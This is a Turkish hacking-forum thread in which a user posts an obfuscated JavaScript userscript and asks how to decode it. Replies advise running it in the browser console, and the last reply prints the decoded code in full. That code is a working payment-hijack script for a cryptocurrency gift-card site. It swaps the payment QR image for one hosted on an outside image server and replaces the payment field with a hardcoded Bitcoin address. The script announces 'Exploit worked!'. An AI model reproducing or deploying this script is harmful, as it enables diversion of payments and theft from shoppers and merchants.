Bu hangi dil ve nasıl çözülür

Tarihe göre sırala Oylara göre sırala
Enistein

Enistein

Kıdemli Üye
16 Eyl 2012
2,234
1,273
Amsterdam
getsmart35' Alıntı:
merhaba arkadaşlar aşşağıda olan kodu nasıl çözebilirim bilgisi olan varmı


// ==UserScript==
// @name
// @namespace
// @version
// @Description
// @Match
// @GranT none
// ==/UserScript==

(()=>{var ᠺՙ̲͖̯̫͌̍͗̀͜͞='ᚲء̪̖̣̜͐͗̽͢͡͠'&'ᱼꜗ̭̦̫ͮ͐ͯ̓̀͘͘͟',ߑˑ̸̢̛̹̝̘̍̍ͬ͑̕=-~'ᖕʼ̶̠̟̥ͯ̅̏̑́͢',ˈ_ཽཽཽʻ̴̆̓̃̊͜͜͏̘̯͖=ߑˑ̸̢̛̹̝̘̍̍ͬ͑̕-~'ᠸꓼ̾̈́̀',ᠸՙ̢̝͖̆̄ͥͣ̕̕ͅ=ˈ_ཽཽཽʻ̴̆̓̃̊͜͜͏̘̯͖+ˈ_ཽཽཽʻ̴̆̓̃̊͜͜͏̘̯͖,ꓺᵔ̷̢̫̟̖̱͛ͪͧ̕=ᠸՙ̢̝͖̆̄ͥͣ̕̕ͅ*ˈ_ཽཽཽʻ̴̆̓̃̊͜͜͏̘̯͖,ᠺ_ٝٝٝہ̴̧͉̼̖̉̽ͦ̃̕=ˈ_ཽཽཽʻ̴̆̓̃̊͜͜͏̘̯͖*ᠸՙ̢̝͖̆̄ͥͣ̕̕ͅ*ˈ_ཽཽཽʻ̴̆̓̃̊͜͜͏̘̯͖,ᠥי̹͙͕̹̊̓ͨ̓͘͢͟=ꓺᵔ̷̢̫̟̖̱͛ͪͧ̕*ᠸՙ̢̝͖̆̄ͥͣ̕̕ͅ,ᛍʹ̷̨͔̹͍̮͂ͥͮ͞=ᠸՙ̢̝͖̆̄ͥͣ̕̕ͅ*ᠺ_ٝٝٝہ̴̧͉̼̖̉̽ͦ̃̕,ᠣꓸ̐ͩͨ͏̵͍̗͎̝͜=ꓺᵔ̷̢̫̟̖̱͛ͪͧ̕*ˈ_ཽཽཽʻ̴̆̓̃̊͜͜͏̘̯͖*ꓺᵔ̷̢̫̟̖̱͛ͪͧ̕,ᐥꓹ̅ͭ̅͏̨̧̻͍̫=ᛍʹ̷̨͔̹͍̮͂ͥͮ͞*ᠸՙ̢̝͖̆̄ͥͣ̕̕ͅ,ʹꓸ̵̧̮͕̝ͨ͋ͫ̕͠=ꓺᵔ̷̢̫̟̖̱͛ͪͧ̕*ᛍʹ̷̨͔̹͍̮͂ͥͮ͞,ʾˇ̍̌ͦ͟͏̴͉̣̺=ᠸՙ̢̝͖̆̄ͥͣ̕̕ͅ*ᐥꓹ̅ͭ̅͏̨̧̻͍̫,ᡍꞈ̵̴̡̥͙̯̃ͪ̒̀=ᛍʹ̷̨͔̹͍̮͂ͥͮ͞*ᠥי̹͙͕̹̊̓ͨ̓͘͢͟,ⵓا̧̪͉͕ͬ̐̓́͘=ᐥꓹ̅ͭ̅͏̨̧̻͍̫*ᠺ_ٝٝٝہ̴̧͉̼̖̉̽ͦ̃̕,ᡍᵔ̵̬̥̳ͣ͑ͧ͝͡=ꓺᵔ̷̢̫̟̖̱͛ͪͧ̕*ʾˇ̍̌ͦ͟͏̴͉̣̺,ᒽˇͮ̒̇̀͡͏͍̖̘̮=ᠥי̹͙͕̹̊̓ͨ̓͘͢͟*ʹꓸ̵̧̮͕̝ͨ͋ͫ̕͠,ꓻᶥͨ͒͐̀͢͏̱̘͉=ᠸՙ̢̝͖̆̄ͥͣ̕̕ͅ*ᡍᵔ̵̬̥̳ͣ͑ͧ͝͡,ˈᶥ̸͇̺̬̐ͤ̍͢͜=!ߑˑ̸̢̛̹̝̘̍̍ͬ͑̕+[],ᠲٴ̸̛̳͈̰͎ͣͬ̃͠=ˈᶥ̸͇̺̬̐ͤ̍͢͜[ᠺՙ̲͖̯̫͌̍͗̀͜͞],ᛍˑͭ̆̂̄͏̸̬͇͈́͜=ᠲٴ̸̛̳͈̰͎ͣͬ̃͠[ߑˑ̸̢̛̹̝̘̍̍ͬ͑̕]+[],ꜗꓽ̶̮̲̭ͩ̃͆̂́͝=ˈᶥ̸͇̺̬̐ͤ̍͢͜[ߑˑ̸̢̛̹̝̘̍̍ͬ͑̕],ᠢꜚ̸̢͓̟͙̆ͨ̎͜=ˈᶥ̸͇̺̬̐ͤ̍͢͜[ˈ_ཽཽཽʻ̴̆̓̃̊͜͜͏̘̯͖],ᒻʹ̸̧̣̰̫̒̒̔́͢=ˈᶥ̸͇̺̬̐ͤ̍͢͜[ˈ_ཽཽཽʻ̴̆̓̃̊͜͜͏̘̯͖+ߑˑ̸̢̛̹̝̘̍̍ͬ͑̕],ޢᵕͭ̇́̚͏̢̝͓̳͍̕=ˈᶥ̸͇̺̬̐ͤ̍͢͜[ᠸՙ̢̝͖̆̄ͥͣ̕̕ͅ],ᒢʿ͎̼̣ͬ͊̋͊́͞͠=ᛍˑͭ̆̂̄͏̸̬͇͈́͜[ᠸՙ̢̝͖̆̄ͥͣ̕̕ͅ+ߑˑ̸̢̛̹̝̘̍̍ͬ͑̕],ʹᵔ̴̴̷̥̖͕̼̌̍̓=[]+{},ᱼٴ̨̛̦̦̯̆ͧ͐̕=ʹᵔ̴̴̷̥̖͕̼̌̍̓[ᠸՙ̢̝͖̆̄ͥͣ̕̕ͅ+ߑˑ̸̢̛̹̝̘̍̍ͬ͑̕],ᱺꓼ̵͕̤̞̐̃͐͠͠=ʹᵔ̴̴̷̥̖͕̼̌̍̓[ˈ_ཽཽཽʻ̴̆̓̃̊͜͜͏̘̯͖],ᠻꓸ̢̛̥̲͉̱͒ͩ̓͠=ᛍˑͭ̆̂̄͏̸̬͇͈́͜[ᠺՙ̲͖̯̫͌̍͗̀͜͞],ヽʺ̷̧͈̦̰ͨ̆́͟=ᛍˑͭ̆̂̄͏̸̬͇͈́͜[ߑˑ̸̢̛̹̝̘̍̍ͬ͑̕],ʻˌ̢̡̻̜͉̻͗ͤ̄́͡=(!ᠺՙ̲͖̯̫͌̍͗̀͜͞+[])[ᠺՙ̲͖̯̫͌̍͗̀͜͞],ꓺˈ̡̡̬̺̬ͥͣ͌͟=ʹᵔ̴̴̷̥̖͕̼̌̍̓[ߑˑ̸̢̛̹̝̘̍̍ͬ͑̕],ꜙꓼ̸̨̬̲̥̒ͥͮ̍́͘=ʹᵔ̴̴̷̥̖͕̼̌̍̓[ꓺᵔ̷̢̫̟̖̱͛ͪͧ̕-ߑˑ̸̢̛̹̝̘̍̍ͬ͑̕],ᣚۃ̴̸̨̤͇̝̤̈ͥ͌́=ᛍˑͭ̆̂̄͏̸̬͇͈́͜[ˈ_ཽཽཽʻ̴̆̓̃̊͜͜͏̘̯͖],ꧦͺ̵̡̡͕̠̜̊̈͋̒=(!ᠺՙ̲͖̯̫͌̍͗̀͜͞+[])[ߑˑ̸̢̛̹̝̘̍̍ͬ͑̕],ᠴγ̈ͥ̓ͪ͏̶̧̠̰̞͠=ᱼٴ̨̛̦̦̯̆ͧ͐̕+ꓺˈ̡̡̬̺̬ͥͣ͌͟+ヽʺ̷̧͈̦̰ͨ̆́͟+ᒻʹ̸̧̣̰̫̒̒̔́͢+ʻˌ̢̡̻̜͉̻͗ͤ̄́͡+ꧦͺ̵̡̡͕̠̜̊̈͋̒+ᠻꓸ̢̛̥̲͉̱͒ͩ̓͠+ᱼٴ̨̛̦̦̯̆ͧ͐̕+ʻˌ̢̡̻̜͉̻͗ͤ̄́͡+ꓺˈ̡̡̬̺̬ͥͣ͌͟+ꧦͺ̵̡̡͕̠̜̊̈͋̒,ޢꜙ̛̛̗̰̝͙̓ͭ̌͌́͝=[][ᠲٴ̸̛̳͈̰͎ͣͬ̃͠+ᒢʿ͎̼̣ͬ͊̋͊́͞͠+ᠢꜚ̸̢͓̟͙̆ͨ̎͜+ʻˌ̢̡̻̜͉̻͗ͤ̄́͡+ޢᵕͭ̇́̚͏̢̝͓̳͍̕+ꧦͺ̵̡̡͕̠̜̊̈͋̒],ᔈە̡̞̩ͫ̂̉͝͠ͅ=ޢꜙ̛̛̗̰̝͙̓ͭ̌͌́͝[ᠴγ̈ͥ̓ͪ͏̶̧̠̰̞͠],ᢜە̡̢̨̗͓̠̾͊͗͐=''[ᠴγ̈ͥ̓ͪ͏̶̧̠̰̞͠]+[],ᢦʿ̶̤͇͓̉̽̀͟͠=ᢜە̡̢̨̗͓̠̾͊͗͐[ߑˑ̸̢̛̹̝̘̍̍ͬ͑̕+ꓺᵔ̷̢̫̟̖̱͛ͪͧ̕],ᔇᶥ̛̯͕͖̯ͨͨͫ̀͝=ᢜە̡̢̨̗͓̠̾͊͗͐[ᠺ_ٝٝٝہ̴̧͉̼̖̉̽ͦ̃̕-ˈ_ཽཽཽʻ̴̆̓̃̊͜͜͏̘̯͖],゙ۂ̸̛̻̠͓̗̀̏̎͢͟=ʻˌ̢̡̻̜͉̻͗ͤ̄́͡+ꓺˈ̡̡̬̺̬ͥͣ͌͟+ᢦʿ̶̤͇͓̉̽̀͟͠+ʻˌ̢̡̻̜͉̻͗ͤ̄́͡+ꧦͺ̵̡̡͕̠̜̊̈͋̒+ᒢʿ͎̼̣ͬ͊̋͊́͞͠+ヽʺ̷̧͈̦̰ͨ̆́͟+ᔇᶥ̛̯͕͖̯ͨͨͫ̀͝,އˈ̵̨̡͙̳̥ͩ͊̍͞=(ߑˑ̸̢̛̹̝̘̍̍ͬ͑̕+ꓺᵔ̷̢̫̟̖̱͛ͪͧ̕+ᠺ_ٝٝٝہ̴̧͉̼̖̉̽ͦ̃̕)[゙ۂ̸̛̻̠͓̗̀̏̎͢͟](ᠥי̹͙͕̹̊̓ͨ̓͘͢͟),ᣚ_ͫͫͫꓸ̶̷̶̡̮͔͔̌̓͋=[][ᠴγ̈ͥ̓ͪ͏̶̧̠̰̞͠][ᠴγ̈ͥ̓ͪ͏̶̧̠̰̞͠](ꧦͺ̵̡̡͕̠̜̊̈͋̒+ޢᵕͭ̇́̚͏̢̝͓̳͍̕+ʻˌ̢̡̻̜͉̻͗ͤ̄́͡+ᠻꓸ̢̛̥̲͉̱͒ͩ̓͠+ꧦͺ̵̡̡͕̠̜̊̈͋̒+ヽʺ̷̧͈̦̰ͨ̆́͟+ꜙꓼ̸̨̬̲̥̒ͥͮ̍́͘+ޢᵕͭ̇́̚͏̢̝͓̳͍̕+ᒻʹ̸̧̣̰̫̒̒̔́͢+ᱼٴ̨̛̦̦̯̆ͧ͐̕+ꜗꓽ̶̮̲̭ͩ̃͆̂́͝+އˈ̵̨̡͙̳̥ͩ͊̍͞+ޢᵕͭ̇́̚͏̢̝͓̳͍̕)(),ʺꓽ̛̜̳͇̑ͭ̽͝͠=ᣚ_ͫͫͫꓸ̶̷̶̡̮͔͔̌̓͋(''[ᱺꓼ̵͕̤̞̐̃͐͠͠+ᒢʿ͎̼̣ͬ͊̋͊́͞͠+ᔇᶥ̛̯͕͖̯ͨͨͫ̀͝]())[ˈ_ཽཽཽʻ̴̆̓̃̊͜͜͏̘̯͖],ꜗᶥ̶̷̢̟͖̫ͣ̆ͭ=(ᠺ_ٝٝٝہ̴̧͉̼̖̉̽ͦ̃̕+ᠸՙ̢̝͖̆̄ͥͣ̕̕ͅ+ˈ_ཽཽཽʻ̴̆̓̃̊͜͜͏̘̯͖)[゙ۂ̸̛̻̠͓̗̀̏̎͢͟](ᠥי̹͙͕̹̊̓ͨ̓͘͢͟),ˌʺ̢̞͙͇̽̒̓̾̀͝=(ᠺ_ٝٝٝہ̴̧͉̼̖̉̽ͦ̃̕+ߑˑ̸̢̛̹̝̘̍̍ͬ͑̕)[゙ۂ̸̛̻̠͓̗̀̏̎͢͟](ᠥי̹͙͕̹̊̓ͨ̓͘͢͟),ޢا̵̷͕̜̮͛͂͂͜=''[ᠴγ̈ͥ̓ͪ͏̶̧̠̰̞͠][ᠲٴ̸̛̳͈̰͎ͣͬ̃͠+ꧦͺ̵̡̡͕̠̜̊̈͋̒+ꓺˈ̡̡̬̺̬ͥͣ͌͟+ꜗᶥ̶̷̢̟͖̫ͣ̆ͭ+ʺꓽ̛̜̳͇̑ͭ̽͝͠+ˌʺ̢̞͙͇̽̒̓̾̀͝+ꜗꓽ̶̮̲̭ͩ̃͆̂́͝+ꧦͺ̵̡̡͕̠̜̊̈͋̒+ʺꓽ̛̜̳͇̑ͭ̽͝͠+ꓺˈ̡̡̬̺̬ͥͣ͌͟+ᣚۃ̴̸̨̤͇̝̤̈ͥ͌́+ޢᵕͭ̇́̚͏̢̝͓̳͍̕],ྋꓸ̴̜̹̞̋͋̑́͞=ᠥי̹͙͕̹̊̓ͨ̓͘͢͟,ᚑٴ̸̛͕̦ͣ͆͊͘͢ͅ=ᠥי̹͙͕̹̊̓ͨ̓͘͢͟+ᛍʹ̷̨͔̹͍̮͂ͥͮ͞,ᡟʹ̻̳̦̫̃̅̃͞͞͠=ꓺᵔ̷̢̫̟̖̱͛ͪͧ̕+ߑˑ̸̢̛̹̝̘̍̍ͬ͑̕+ᛍʹ̷̨͔̹͍̮͂ͥͮ͞+ᠥי̹͙͕̹̊̓ͨ̓͘͢͟+ˈ_ཽཽཽʻ̴̆̓̃̊͜͜͏̘̯͖+ᠸՙ̢̝͖̆̄ͥͣ̕̕ͅ,ܖ_֠֠֠ꞈ̷̖̗͓͒̉ͧ̀͠=ᠥי̹͙͕̹̊̓ͨ̓͘͢͟+ꓺᵔ̷̢̫̟̖̱͛ͪͧ̕,ᔅˑ̛͈̥̰̒ͨ̐͢͞͞=ᠸՙ̢̝͖̆̄ͥͣ̕̕ͅ+ᛍʹ̷̨͔̹͍̮͂ͥͮ͞,ᐝꓽ̴̝̻͗̅́̀͘ͅ=ᠥי̹͙͕̹̊̓ͨ̓͘͢͟+ᠺ_ٝٝٝہ̴̧͉̼̖̉̽ͦ̃̕+ߑˑ̸̢̛̹̝̘̍̍ͬ͑̕+ᛍʹ̷̨͔̹͍̮͂ͥͮ͞,ᡃ_۟۟ʻͨ̂̎̒͏̵̨̙͍͈=ᛍʹ̷̨͔̹͍̮͂ͥͮ͞+ᠺ_ٝٝٝہ̴̧͉̼̖̉̽ͦ̃̕+ᠥי̹͙͕̹̊̓ͨ̓͘͢͟+ߑˑ̸̢̛̹̝̘̍̍ͬ͑̕+ˈ_ཽཽཽʻ̴̆̓̃̊͜͜͏̘̯͖,ᡍʻ̵̨̨̱̮͇̾̉̃=ᠥי̹͙͕̹̊̓ͨ̓͘͢͟+ˈ_ཽཽཽʻ̴̆̓̃̊͜͜͏̘̯͖,ᔅہ̵̸̘̖͕̆̓́́͠=ߑˑ̸̢̛̹̝̘̍̍ͬ͑̕+ᛍʹ̷̨͔̹͍̮͂ͥͮ͞+ᠸՙ̢̝͖̆̄ͥͣ̕̕ͅ+ᠥי̹͙͕̹̊̓ͨ̓͘͢͟+ᠺ_ٝٝٝہ̴̧͉̼̖̉̽ͦ̃̕+ꓺᵔ̷̢̫̟̖̱͛ͪͧ̕,ᠵγ̷̧̣̯͉͈̈́̒͌͘=ˈ_ཽཽཽʻ̴̆̓̃̊͜͜͏̘̯͖+ꓺᵔ̷̢̫̟̖̱͛ͪͧ̕+ᠸՙ̢̝͖̆̄ͥͣ̕̕ͅ+ᛍʹ̷̨͔̹͍̮͂ͥͮ͞+ᠥי̹͙͕̹̊̓ͨ̓͘͢͟,ᠻʾ̸̴̝͎̱ͤ͗̋͢=ᠥי̹͙͕̹̊̓ͨ̓͘͢͟+ߑˑ̸̢̛̹̝̘̍̍ͬ͑̕,ᐦˌ̨̲̫͌ͧ͌͘͠ͅ=ᛍʹ̷̨͔̹͍̮͂ͥͮ͞+ᠺ_ٝٝٝہ̴̧͉̼̖̉̽ͦ̃̕+ˈ_ཽཽཽʻ̴̆̓̃̊͜͜͏̘̯͖+ᠸՙ̢̝͖̆̄ͥͣ̕̕ͅ+ᠥי̹͙͕̹̊̓ͨ̓͘͢͟,ꞈʼͪ̆̚͏̣̞̥́͢=ꓺᵔ̷̢̫̟̖̱͛ͪͧ̕+ˈ_ཽཽཽʻ̴̆̓̃̊͜͜͏̘̯͖,ہ_ࣾ_ۤۤۤ=ᛍʹ̷̨͔̹͍̮͂ͥͮ͞+ᠥי̹͙͕̹̊̓ͨ̓͘͢͟+ᠺ_ٝٝٝہ̴̧͉̼̖̉̽ͦ̃̕,އꜙ̡̱͉̬̀̄̍́̕͠=ˈ_ཽཽཽʻ̴̆̓̃̊͜͜͏̘̯͖+ߑˑ̸̢̛̹̝̘̍̍ͬ͑̕+ᠸՙ̢̝͖̆̄ͥͣ̕̕ͅ+ᠺ_ٝٝٝہ̴̧͉̼̖̉̽ͦ̃̕+ᠥי̹͙͕̹̊̓ͨ̓͘͢͟,ᵕە̸̷̗͈̤̋̆ͩ͢=ߑˑ̸̢̛̹̝̘̍̍ͬ͑̕+ꓺᵔ̷̢̫̟̖̱͛ͪͧ̕+ᠥי̹͙͕̹̊̓ͨ̓͘͢͟,ⴰʹ̞͓͕̏̊̆̔̕͞͡=ߑˑ̸̢̛̹̝̘̍̍ͬ͑̕+ᠥי̹͙͕̹̊̓ͨ̓͘͢͟+ꓺᵔ̷̢̫̟̖̱͛ͪͧ̕+ᠸՙ̢̝͖̆̄ͥͣ̕̕ͅ,ᚒہ̩͍͖̪̊͛ͥ̋́͟͠=ˈ_ཽཽཽʻ̴̆̓̃̊͜͜͏̘̯͖+ߑˑ̸̢̛̹̝̘̍̍ͬ͑̕+ꓺᵔ̷̢̫̟̖̱͛ͪͧ̕+ᠥי̹͙͕̹̊̓ͨ̓͘͢͟+ᠺ_ٝٝٝہ̴̧͉̼̖̉̽ͦ̃̕,ᡟۀ̵̵̬̭͙ͭ̋͆̕͠=ᛍʹ̷̨͔̹͍̮͂ͥͮ͞+ꓺᵔ̷̢̫̟̖̱͛ͪͧ̕+ˈ_ཽཽཽʻ̴̆̓̃̊͜͜͏̘̯͖+ߑˑ̸̢̛̹̝̘̍̍ͬ͑̕+ᠺ_ٝٝٝہ̴̧͉̼̖̉̽ͦ̃̕,ʹٴ̡̢͙̣̠̏̏͛̀͠ͅ=
Genişletmek için tıkla ...
Merhaba,

bozulmuş bir javascript koduna benziyor (ilk satırda (()=>{var yazan kısım javascripte ait.).
Muhtemelen şifrelenmiş hali(64 base olabilir) yanlış parametrelerle decode edilmeye çalışılmış.
Eğer orjinal şifreli hali elinizde mevcutsa çözümü daha kolay olabilir.

İyi forumlar!
 
Oyla 0 Downvote
zztri

zztri

Yaşayan Forum Efsanesi
9 Tem 2015
10,053
390
Ankara
Saçmasapan unicode karakterleri fonksiyon ve değişken adı olarak alabildiğine göre bu javascript.

Zaten userscript taslağı kullanmış. Yani Userscript /Userscript arası parametreler girilseydi, o değerler asıl javascript içinde kullanılacaktı. O kısmı tamamen önemsemeyebiliriz, ne de olsa her şey boş.

Aşağıdaki kısım aptalca bir obfuscation denemesi, ekstra karakterler yerine normal karakterleri atarsan anlamlı bir script çıkacak, ama eksik paste etmişsin. (()=>{ diye başladığına göre }) ile bitmeliydi. Yani kendi kendini tanımlayıp hemen çalıştıran bir lambda fonksiyonu bu. jQuery gibi kütüphanelerin minified versiyonunu düşünün, kendi init fonksiyonunu ve bu fonksiyon objesinin elemanları olarak bütün kütüphaneyi tanımlayıp bir seferde init edecek.

Ama seninki = ile bitiyor. Yani eksik olmalı. Kütüphanenin kompleksliğine göre sayfalarca bile olabilir.

Tamamını paste edersen çözebiliriz, aslında çözmemize bile gerek kalmaz. Minified javascripti okunabilir hale getiren online araçlar var. Ondan sonra da azıcık takiple ne iş yaptığını görürüz.

Yahu zaten "javascript" bu, genelde amacın ne yaptığını değil de nasıl bypass edeceğini (captcha vs. gibi şeyler için) görmektir. Bypass'a uğraşmak daha kolay olabilir.
 
Oyla 0 Downvote
G

getsmart35

Yeni üye
20 Şub 2023
4
0
Mentalistler' Alıntı:
Merhaba,

bozulmuş bir javascript koduna benziyor (ilk satırda (()=>{var yazan kısım javascripte ait.).
Muhtemelen şifrelenmiş hali(64 base olabilir) yanlış parametrelerle decode edilmeye çalışılmış.
Eğer orjinal şifreli hali elinizde mevcutsa çözümü daha kolay olabilir.

İyi forumlar!
Genişletmek için tıkla ...

zztri' Alıntı:
Saçmasapan unicode karakterleri fonksiyon ve değişken adı olarak alabildiğine göre bu javascript.

Zaten userscript taslağı kullanmış. Yani Userscript /Userscript arası parametreler girilseydi, o değerler asıl javascript içinde kullanılacaktı. O kısmı tamamen önemsemeyebiliriz, ne de olsa her şey boş.

Aşağıdaki kısım aptalca bir obfuscation denemesi, ekstra karakterler yerine normal karakterleri atarsan anlamlı bir script çıkacak, ama eksik paste etmişsin. (()=>{ diye başladığına göre }) ile bitmeliydi. Yani kendi kendini tanımlayıp hemen çalıştıran bir lambda fonksiyonu bu. jQuery gibi kütüphanelerin minified versiyonunu düşünün, kendi init fonksiyonunu ve bu fonksiyon objesinin elemanları olarak bütün kütüphaneyi tanımlayıp bir seferde init edecek.

Ama seninki = ile bitiyor. Yani eksik olmalı. Kütüphanenin kompleksliğine göre sayfalarca bile olabilir.

Tamamını paste edersen çözebiliriz, aslında çözmemize bile gerek kalmaz. Minified javascripti okunabilir hale getiren online araçlar var. Ondan sonra da azıcık takiple ne iş yaptığını görürüz.

Yahu zaten "javascript" bu, genelde amacın ne yaptığını değil de nasıl bypass edeceğini (captcha vs. gibi şeyler için) görmektir. Bypass'a uğraşmak daha kolay olabilir.
Genişletmek için tıkla ...
çok uzun olduğun açısından paylaşamamıştım şimdi full halini editledim
 
Oyla 0 Downvote
zztri

zztri

Yaşayan Forum Efsanesi
9 Tem 2015
10,053
390
Ankara
getsmart35' Alıntı:
çok uzun olduğun açısından paylaşamamıştım şimdi full halini editledim
Genişletmek için tıkla ...
Dediğim gibi, gerizekalıca bir obfuscation denemesi... İnsanlar bu kadar basit bypass edilirken böyle aptalca şeylerle niye uğraşır anlamam ki...

Hiç bir şey yapmana gerek yok üstad. Bir tane google chrome aç, sayfa olarak "about:blank" yani boş sayfa aç. F12'ye bas, konsolu seç, bu kodu seç ve yapıştır. Zaten kodu inject ediyor sayfaya.

Edit: Ortaya çıkan kodu yeni okudum da... Aha... Serverside'da test edilmeyen QR mı buldun?

JavaScript: 
    const QR = "https://i10.bunkr.ru/qr-transaction-5uiux5cy.png";
     const BTC = "bc1q6zrprt3wef9ar0vqv6vmyj278sg5q2qaz550qx";

    function updatePageData() {

        console.log("Trying to find QR image...");
        let qrContainer = document.querySelector(".qr-container");
        if (!qrContainer)
            return setTimeout(updatePageData, 10);
        let qrImage = qrContainer.querySelector("img");
        if (!qrImage)
            return setTimeout(updatePageData, 10);

         if (!qrImage.src.startsWith("https://api.cryptorefills.com"))
            return setTimeout(updatePageData, 10);

        console.log("Found QR image! Replacing image...");
        qrImage.src = QR;

        document.querySelector(".payment-codes").querySelectorAll("input")[1].value = BTC;
    }

    function onCartPage() {
        alert(`Exploit worked! Choose "Bitcoin", press "Proceed" and pay for the order`);
    }

    function onPaymentPage() {
        updatePageData();
    }

    window.addEventListener("locationchange", function () {
        if (window.location.pathname == "/payment")
            onPaymentPage();
        if (window.location.pathname == "/cart")
            onCartPage();
    });

    (() => {

        let oldPushState = history.pushState;
        history.pushState = function pushState() {
            let ret = oldPushState.apply(this, arguments);
            window.dispatchEvent(new Event("pushstate"));
            window.dispatchEvent(new Event("locationchange"));
            return ret;
        };

        let oldReplaceState = history.replaceState;
        history.replaceState = function replaceState() {
            let ret = oldReplaceState.apply(this, arguments);
            window.dispatchEvent(new Event("replacestate"));
            window.dispatchEvent(new Event("locationchange"));
            return ret;
        };

        window.addEventListener("popstate", () => {
            window.dispatchEvent(new Event("locationchange"));
        });
    })();

    if (window.location.pathname == "/payment")
        onPaymentPage();
    if (window.location.pathname == "/cart")
        onCartPage();

    console.log("Loaded script!");
 
Oyla 0 Downvote
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.